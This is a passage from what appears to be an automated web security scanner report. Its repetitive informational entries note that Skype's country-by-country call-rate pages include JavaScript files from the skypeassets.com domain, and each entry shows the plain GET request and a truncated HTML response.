   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.682. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cuba  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cuba

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cuba HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.683. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cyprus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cyprus

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cyprus HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.684. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-czech-republic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-czech-republic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-czech-republic HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.685. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-denmark  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-denmark

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-denmark HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.686. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-djibouti  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-djibouti

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-djibouti HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.687. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominica  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-dominica

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-dominica HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:47 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.688. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominican-republic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-dominican-republic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-dominican-republic HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.689. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ecuador  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-ecuador

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-ecuador HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.690. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-egypt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-egypt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-egypt HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.691. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-el-salvador  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-el-salvador

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-el-salvador HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.692. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-equatorial-guinea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-equatorial-guinea

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-equatorial-guinea HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.693. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-eritrea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-eritrea

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-eritrea HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:48 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.694. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-estonia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-estonia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-estonia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:21 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.695. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ethiopia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-ethiopia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-ethiopia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.696. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-falkland-islands-malvinas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-falkland-islands-malvinas

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-falkland-islands-malvinas HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.697. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-faroe-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
